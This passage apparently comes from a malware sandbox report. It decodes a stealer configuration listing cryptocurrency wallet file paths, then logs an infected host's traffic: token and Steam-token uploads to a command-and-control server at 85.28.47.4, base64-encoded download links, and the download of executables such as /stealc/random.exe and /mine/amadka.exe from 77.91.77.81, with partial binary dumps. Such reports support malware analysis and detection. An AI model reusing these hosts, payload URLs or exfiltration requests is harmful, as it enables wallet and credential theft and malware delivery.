Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Jul 2, 2024 00:05:41.378983974 CEST	462	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JEGHDAFIDGDAAKEBFHDA Host: 85.28.47.4 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 47 48 44 41 46 49 44 47 44 41 41 4b 45 42 46 48 44 41 2d 2d 0d 0a Data Ascii: ------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------JEGHDAFIDGDAAKEBFHDAContent-Disposition: form-data; name="message"files------JEGHDAFIDGDAAKEBFHDA--
Jul 2, 2024 00:05:41.560461044 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 2, 2024 00:05:41.591415882 CEST	560	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGHDHIDGHIDGIECBKKJJ Host: 85.28.47.4 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 44 48 49 44 47 48 49 44 47 49 45 43 42 4b 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------DGHDHIDGHIDGIECBKKJJContent-Disposition: form-data; name="file"------DGHDHIDGHIDGIECBKKJJ--
Jul 2, 2024 00:05:42.296658993 CEST	202	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:41 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Jul 2, 2024 00:05:42.327970028 CEST	467	OUT	POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCAAEBFHJJDAAKFIECGD Host: 85.28.47.4 Content-Length: 270 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 64 66 35 35 65 36 30 39 32 62 64 64 38 62 37 37 62 34 34 61 37 38 37 30 63 39 66 36 65 62 36 32 37 61 38 63 39 39 37 63 30 37 30 35 32 65 35 37 31 62 36 34 34 37 39 30 61 63 32 38 31 64 37 30 66 31 37 36 64 64 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 41 45 42 46 48 4a 4a 44 41 41 4b 46 49 45 43 47 44 2d 2d 0d 0a Data Ascii: ------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="token"a4df55e6092bdd8b77b44a7870c9f6eb627a8c997c07052e571b644790ac281d70f176dd------FCAAEBFHJJDAAKFIECGDContent-Disposition: form-data; name="message"jbdtaijovg------FCAAEBFHJJDAAKFIECGD--
Jul 2, 2024 00:05:43.191689968 CEST	331	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:42 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 104 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 63 33 4c 6a 6b 78 4c 6a 63 33 4c 6a 67 78 4c 32 31 70 62 6d 55 76 59 57 31 68 5a 47 74 68 4c 6d 56 34 5a 58 77 77 66 44 42 38 66 47 68 30 64 48 41 36 4c 79 38 33 4e 79 34 35 4d 53 34 33 4e 79 34 34 4d 53 39 6a 62 33 4e 30 4c 32 64 76 4c 6d 56 34 5a 58 77 77 66 44 42 38 66 41 3d 3d Data Ascii: aHR0cDovLzc3LjkxLjc3LjgxL21pbmUvYW1hZGthLmV4ZXwwfDB8fGh0dHA6Ly83Ny45MS43Ny44MS9jb3N0L2dvLmV4ZXwwfDB8fA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	60390	77.91.77.81	80	6256	C:\Users\user\Documents\SimpleAdobe\Lbg6Jgx2PuK0JimgGIFCI5UU.exe

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:43.209892988 CEST	77	OUT	GET /mine/amadka.exe HTTP/1.1 Host: 77.91.77.81 Cache-Control: no-cache
Jul 2, 2024 00:05:43.966315031 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:05:43 GMT Content-Type: application/octet-stream Content-Length: 1874432 Last-Modified: Mon, 01 Jul 2024 20:58:38 GMT Connection: keep-alive ETag: "6683187e-1c9a00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 50 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELafPJ@J`@Xl\|<J,<J @.rsrc@.idata @ *@jkbeubqv0@ybbtgqtz@Jr@.taggant0PJ"x@
Jul 2, 2024 00:05:43.966346979 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 2, 2024 00:05:43.966360092 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 2, 2024 00:05:43.966372013 CEST	672	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Jul 2, 2024 00:05:43.966383934 CEST	1236	IN	Data Raw: 53 dd 28 2d b5 16 bf 4c ea 15 51 5d 9c b7 b3 96 1c 11 8d 56 a6 15 2a 7f 56 a5 17 a2 bc 3f 55 52 e0 16 dd a2 45 84 e7 fc 4c 4e b6 d0 d2 33 51 05 44 d9 86 15 c7 3d a9 50 12 6e 73 23 d4 95 e8 80 a8 be 49 95 27 96 98 25 4b 2b e9 74 75 21 65 4d b5 e4 Data Ascii: S(-LQ]V*V?URELN3QD=Pns#I'%K+tu!eM= RI 4ReEA%g@RiQtSd%4=QQtrx&vdJ%p9'GsoGie5$E==DL\|ho9dD.
Jul 2, 2024 00:05:43.966393948 CEST	224	IN	Data Raw: 7c 1a b7 0c e0 bb 98 34 aa a5 49 15 24 f1 3f b9 a3 16 51 15 4c b9 85 1c 87 b1 e8 f0 8c ae 5e 16 54 75 f4 8c 6b 1a b1 bf 93 c5 96 65 36 b5 b6 dc 45 e1 8c 8d 46 f4 28 8d fc b2 18 2d b2 1d 6f b3 d7 02 97 ff f2 17 89 f1 82 0e 59 db e8 15 f1 48 a3 a5 Data Ascii: \|4I$?QL^Tuke6EF(-oYH)}1&\sun0=Q GR@u4!(Q (~1Lt@0]&=Nj4}siU
Jul 2, 2024 00:05:43.966437101 CEST	1236	IN	Data Raw: 7d ce 4c 95 c3 96 58 7c 4c 85 17 8d 1c 38 b0 8c 97 15 7d 11 92 e4 e7 9c 6d 1e 60 ad f3 bd 97 e0 a5 27 8a 9d e7 f7 98 65 be 85 38 5d c4 15 ed 50 a2 24 75 53 04 16 a0 71 b4 71 f8 94 b7 49 b6 ff f4 17 89 fb b0 0e 8d 98 07 d7 98 9d cb 1a 98 df 44 a5 Data Ascii: }LX\|L8}m`'e8]P$uSqqIDpU(E8P4\Phns?% v&OtSi&@55DeE/d}&DDY[s'*=kwM?WD!#<_U{v]oE%}e'?w6E
Jul 2, 2024 00:05:43.966448069 CEST	224	IN	Data Raw: 35 ef a7 19 7f 5d 7b de 52 9f 34 30 36 c7 8c 82 2d 85 b6 9f 14 b6 7c af 84 91 ff 81 b4 ca 98 52 12 e1 95 2d 14 75 e8 e4 b7 24 72 d8 2d 68 a6 7c 46 c2 a0 3e 0a 73 e9 9c dd 77 78 05 0f 3c 55 a2 d9 40 4f 6f 72 04 83 55 2c 9d b0 13 48 99 e8 84 d9 d0 Data Ascii: 5]{R406-\|R-u$r-h\|F>swx<U@OorU,H016qq{$CQq%?qE]7!%A(=?WHGdhb@</S8V/(s6}HI;Q%Ky\%(Tut)fE
Jul 2, 2024 00:05:43.966464043 CEST	1236	IN	Data Raw: 93 0c 21 a9 ba 7c 10 f5 bd 71 ea f8 47 fe 32 b2 b4 5d 07 47 1f 87 54 08 c0 5a 64 1c aa 4c 68 c5 42 5d af e9 15 66 a3 f8 af 20 96 c4 e5 11 e8 c1 28 3a f7 2e cc 73 07 34 4f 93 83 cd 6c 71 b6 59 60 c7 08 34 ad bf db 32 28 31 e9 97 30 bd e6 f4 a1 6d Data Ascii: !\|qG2]GTZdLhB]f (:.s4OlqY`42(10mHTRKz7ULg!\eZU\_L`URIY<"apu$"3r6o8fN@oJE2([`Ux$-"ko;j&9Ev7\[
Jul 2, 2024 00:05:43.966474056 CEST	224	IN	Data Raw: 40 d7 a1 fa b9 bf b3 34 40 02 e5 95 db 59 a1 00 87 ec 6d a6 a8 16 3d 25 90 45 6b 50 38 fb f4 5f 58 bb 9f 98 61 21 7d 3d 14 bc 8c 28 e0 f9 ff 49 ac 1d 79 f2 f8 d3 b2 fe d7 9d 64 94 0e c3 b1 05 82 20 a2 08 b6 08 a3 15 b5 13 8e fa fc 45 66 1f ab c2 Data Ascii: @4@Ym=%EkP8_Xa!}=(Iyd EfTxb^p_<(LG~b)VD/3F}9a}71uIwe-EwTX')9q)3kg=]UO9j&GX
Jul 2, 2024 00:05:43.973010063 CEST	1236	IN	Data Raw: e3 83 ec 5c 57 e7 e8 ca b0 b1 af 7a 25 20 f0 0d f0 93 19 c1 50 5d f1 18 55 50 88 15 a5 12 4a b4 d9 f8 e8 2e 34 65 35 46 44 28 8d 0a 92 ce f8 dc 9f bf 64 0d ff a8 de 25 4d 6d d0 c3 39 9e 09 4b f7 ad e5 47 70 42 54 81 6b 71 4c 43 f4 92 34 8a d7 3c Data Ascii: \Wz% P]UPJ.4e5FD(d%Mm9KGpBTkqLC4<"4][sCPd0Tt7_H<:I`nt6)CXEHoe"NA?<LF,nXB}\ o5ey

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.6	60406	77.91.77.82	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:51.109184027 CEST	151	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 2, 2024 00:05:51.848011017 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:05:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 2, 2024 00:05:51.888060093 CEST	309	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 36 32 45 37 36 42 38 35 30 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A78B62E76B85082D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Jul 2, 2024 00:05:52.115000963 CEST	283	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:05:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 35 64 0d 0a 20 3c 63 3e 31 30 30 30 30 30 36 30 30 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 62 30 64 35 64 61 32 63 38 35 30 36 37 33 62 35 64 37 36 61 63 31 63 65 38 63 63 64 34 61 36 65 37 66 31 66 62 64 39 37 65 39 63 34 35 34 33 62 33 31 64 65 31 35 34 34 31 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 5d <c>1000006001+++b5937c1a99d5f9db0d5da2c850673b5d76ac1ce8ccd4a6e7f1fbd97e9c4543b31de15441#<d>0
Jul 2, 2024 00:05:55.959268093 CEST	179	OUT	POST /Hun4Ko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.77.82 Content-Length: 31 Cache-Control: no-cache Data Raw: 65 31 3d 31 30 30 30 30 30 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: e1=1000006001&unit=246122658369
Jul 2, 2024 00:05:57.182749987 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:05:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jul 2, 2024 00:05:57.184868097 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:05:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jul 2, 2024 00:05:57.185506105 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:05:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0
Jul 2, 2024 00:05:57.186449051 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:05:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.6	60407	77.91.77.81	80

Timestamp	Bytes transferred	Direction	Data
Jul 2, 2024 00:05:52.416413069 CEST	54	OUT	GET /stealc/random.exe HTTP/1.1 Host: 77.91.77.81
Jul 2, 2024 00:05:53.120803118 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Mon, 01 Jul 2024 22:05:53 GMT Content-Type: application/octet-stream Content-Length: 2520576 Last-Modified: Mon, 01 Jul 2024 12:19:06 GMT Connection: keep-alive ETag: "66829eba-267600" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 89 fa 75 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 24 fc be 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 20 bf 00 00 04 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$JdZaaa5ZaaRichPELuf!$@ @ @@@0!@@Pp# @y#(@.dataP"B"4@
Jul 2, 2024 00:05:53.120821953 CEST	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a7 e1 3c 45 5e d4 96 c3 5e 4d 4a b8 f8 de aa 31 66 fb f1 7b 8b 81 c1 c0 92 Data Ascii: <E^^MJ1f{+L9t76kz&Z"i<HsdL i%'2cmKnl:_-+Kr3!7+0 W+p-(_P7MUR-W"ZYc[)AX<"@@
Jul 2, 2024 00:05:53.120845079 CEST	1236	IN	Data Raw: 2f f5 0d ee 5c 33 a3 20 41 1d 90 39 fb 42 38 0e 71 73 72 35 19 f2 c2 6f ca 46 fb 91 c2 d9 51 94 15 2f f1 77 dc 35 30 db 3c b7 86 c4 56 25 be bb 9c ac 72 c5 34 c2 42 97 81 d2 70 7f 18 71 6a 6b b9 a4 c9 32 31 14 3b 48 6e 13 eb be 02 9a 50 0c f9 df Data Ascii: /\3 A9B8qsr5oFQ/w50<V%r4Bpqjk21;HnP!H*62C#\|<" >dNQ4"vssy t@L=hZ(D=norFhCtV'-dP4!@@.U4hx_WOH!^(ec
Jul 2, 2024 00:05:53.120857954 CEST	672	IN	Data Raw: 66 33 21 8f 40 10 d1 17 d6 60 2c a0 82 23 72 f3 ee b2 1e f6 66 10 47 ca a0 12 4b c8 b7 57 66 e8 06 0f d4 6f fd 93 5f 74 a4 9c dd 3a 0c 25 09 7f fd a6 ce e2 bb 89 dd e9 92 de 0f ef 3c e5 20 dc cc 22 68 06 57 80 18 74 9c a5 f6 1c ad 06 5b 71 1d c6 Data Ascii: f3!@`,#rfGKWfo_t:%< "hWt[q:tyi:f)cDRV[`oxo?_*R1-tDz`Nq}jNu?iRplK@iqQgZyj]b'+z[-.0l)!d'(L'L?;,
Jul 2, 2024 00:05:53.120876074 CEST	1236	IN	Data Raw: cf 22 4d 12 e4 3d 37 58 73 c4 45 1a f6 de 39 21 c7 cb 1a a5 a8 b0 31 7f 48 21 2d b2 33 5c 1b 1c 49 83 b5 f5 72 fb 91 91 08 49 3c 98 aa 52 48 d1 44 1a 0f 3a e9 b9 27 9b c7 81 9e e3 21 21 82 b1 a8 01 fb 8e 6c bb 8d 3a 3f 23 3d 47 a4 26 79 f2 94 02 Data Ascii: "M=7XsE9!1H!-3\IrI<RHD:'!!l:?#=G&yTx?~C'tJurWnaT{lhdu&f"!\b\|30SwgV6E[XU#y;La[R4O@/,
Jul 2, 2024 00:05:53.120888948 CEST	1236	IN	Data Raw: 31 d9 2b 0c fa 90 f5 e4 2a 58 dc 5d c9 f6 7f 6a 59 17 79 17 8f 1f 6e db 43 bc e6 4d 97 40 dc 67 1e 22 06 bd d0 11 3e d6 cd 66 59 52 67 b3 73 fd 43 85 63 bb 60 04 1b 46 20 e6 00 4e 51 91 f3 93 b6 6b 20 d3 59 52 3b bc 8d f1 3f 2d 0c 71 cb ba ad f1 Data Ascii: 1+X]jYynCM@g">fYRgsCc`F NQk YR;?-qM_zJ=V2/\|@J9X Et(YoSGq297}>lPN@`BdE\Yk+_xxz"^.#_G1AS_+w=>oqj
Jul 2, 2024 00:05:53.120906115 CEST	1236	IN	Data Raw: 20 4a 23 c7 3f 08 c6 c9 c4 cc be d0 60 b7 44 c2 55 23 10 e3 f5 cf 8e 6b 82 1b ba 30 96 ef 39 f8 c8 08 76 7d 74 61 c0 2c 3a 63 a8 1f 61 40 be 9e 25 b9 8b 26 12 ae f6 ab 85 86 bf 37 c8 6e cf 4b e5 28 d9 93 ff 47 5d 97 af 6b db 20 dd 80 47 30 bc a4 Data Ascii: J#?`DU#k09v}ta,:ca@%&7nK(G]k G0}D67PW=VRh'COC,N2]Pc0f3uc~/tE]J\|).CUdzAG0p0?2M;_{"B
Jul 2, 2024 00:05:53.120918989 CEST	1236	IN	Data Raw: 6d b5 aa ba 2c cc 15 19 34 47 fe 79 e7 b5 c8 ec 7e 1a 97 ba 9e 6b 33 b5 b0 73 f0 2f c6 95 bf a4 e0 48 d9 69 fb 46 7d bf 44 dd 33 43 58 f7 47 93 8e 2d ea f2 85 f9 06 50 94 f8 45 ef 62 c1 79 74 af 54 b2 dd 14 e0 f0 2c e2 af fe 4b c5 c0 ab 25 d1 4e Data Ascii: m,4Gy~k3s/HiF}D3CXG-PEbytT,K%Nst569KD&>M&iaYGHV0h9M}j\n @*L"DN['E,UWIQMiotdm"\L@[('C
